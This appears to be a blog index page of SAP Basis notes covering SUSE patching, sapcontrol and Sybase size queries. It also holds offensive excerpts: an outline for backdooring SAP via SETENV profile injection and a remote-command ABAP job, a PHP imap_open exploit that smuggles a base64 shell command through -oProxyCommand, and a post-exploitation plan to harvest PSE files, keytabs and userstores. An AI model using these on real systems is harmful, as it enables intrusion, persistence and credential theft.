Posts

SuSE Update Lists No Repository

Image
We need to perform OS patching for ORAC But found the SUSE connect error and no repositorieds defined. No updates can found currently.


ls -l /etc/products.d
Wrong baseproduct is defined, it should be SLES_SAP.prod
cd /etc/products.d unlink baseproduct ln -s SLES_SAP.prod baseproduct
cat /var/log/cloudregister
zypper repos
zypper lp --category security
Kudos to Stijn De Regge
//alak



Restart an SAP service internally in SAP without restarting the service itself

If we restart whole instance, users get disconnected etc, so in a case, for example, we want to restart only message server, we can eithr use MMC and All Task > Restart Service for MessageServer or more simply via command:

sapcontrol -nr 61 -function RestartService
and to check:

sapcontrol -nr 61 -function GetProcessList
Kudos to Stijn De Regge and Tibor Fenyosi for the guide! :3

/alak

SYBASE ASE - Neatly Display DB/Schema Sizes

when running isql it should have "-w999" ​ isql -Usapsa -S -P -X -w999 ​ after that here are the commands: ​ use master ​ go ​ declare @pagesize numeric(19,0) select @pagesize=(select @@maxpagesize) SELECT "DB Name" = CONVERT(char(15), db_name(D.dbid)),"DB Size MB" = STR(SUM(CASE WHEN U.segmap != 4 THEN U.size*@pagesize/1048576 END),10,1), "Used Data MB" = STR(SUM(CASE WHEN U.segmap != 4 THEN size - curunreservedpgs(U.dbid, U.lstart, U.unreservedpgs)END)*@pagesize/1048576,10,1), "Data Full%" = STR(100 * (1 - 1.0 * SUM(CASE WHEN U.segmap != 4 THEN curunreservedpgs(U.dbid, U.lstart, U.unreservedpgs) END)/SUM(CASE WHEN U.segmap != 4 THEN U.size END)),9,1), "Log Size MB" = STR(SUM(CASE WHEN U.segmap = 4 THEN U.size*@pagesize/1048576 END),10,1), "Free Log MB" = STR(lct_admin("logsegment_freepages",D.dbid)*@pagesize/1048576,10,1), "Log Full%" = STR(100 * (1 - 1.0 * lct_admin("logsegment_fr…

SAP Backdoors {placeholder Post]

This is a placeholder for future post, on backdooring SAP servers:

1. SAP profile SETENV_xx parameter
- if get local access, or SAP level access can cat or echo a line into profile parameter file
- concatenated command for SETENV_+xx param

2. Using ABAP program + SM37
- ABAP program to fetch comamnd from a remote server (HTTP-GET ABAP Function Module)
- schedule job every 2 minits interval
- for that job, set spool recipient to remote attacker email so output can be sent over
- Pre-req: SCOT configuration, Auth for SM36, SE38

to be continued..

//alak

Bypassing PHP’s Disabled exec()

Source: https://github.com/Bo0oM/PHP_imap_open_exploit
<?php # https://antichat.com/threads/463395/#post-4254681 # echo '1234567890'>/tmp/test0001 $server="x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh}"; imap_open('{'.$server.':143/imap}INBOX', '', '') ordie("\n\nError: ".imap_last_error()); ?>

SAP Post-Exploitation - One script to 0wn 'em All

The topic here is this: Post-exploitation for SAP systens - not at application level, but at OS level..

Imagine a red-teamer gained acess to aadm user ID. Having SSH or RDP access. Whats next? Well, theres a lot he/sehe can do. adm has the rights to go query DB directly. adm can access userkeystore. adm typically has the rights to read PSE files and keytabs. adm typically can access /sapmnt/trans of other SID within the landscape. adm can aslo access profiles, DEFAULT.PFL, etc, and insert a command line backdoor that will restart each time the application starts.
Watch this space. Am developing that script. :)

=============================
SECTION 1: The Possible Probe Points
=============================

- Get the SID via /etc/passwd or net users or service query or current user
- Identify possible PSE file location
- identfiy any possible cert dumps to get p12 format
- identify DB and kernel version
- identify connectivity and userstore - R3trans or sqlplus or hdbsql or sqlcmd etc..

SAP SWPM Software Provision Manager SL Toolset 1.0 SP22 Startup Options

This is just a rough note on the options and properties we can set upon running apinst when installing a SAP system.

Version:

[root@host SWPM]# ./sapinst -v
[==============================] - extracting...  done!
INFO       2018-04-19 11:54:56.315 (mainThread) [sixxcreate.cpp:346]
********************************************************************************
Initial log directory: /root/.sapinst/falconheavy.vantage-intl.com/12345
********************************************************************************


SAPinst build information:
--------------------------
Version:         749.0.47
Build:           1832063
Compile time:    Mar 27 2018 - 13:22:27
Make type:       optU
Codeline:        749_REL
Platform:        linuxx86_64
Kernel build:    749, patch 426, changelist 1830485
SAP JRE build:   SAP Java Server VM (build 8.1.037 9.0.4+011, Feb 27 2018 15:45:47 - 81_REL - optU - linux amd64 - 6 - bas2:302122 (mixed mode))
SAP JCo build:   3.0.17
SL-UI version:   2.6.21
SAP UI5 version: 1.50.4
[root@host S…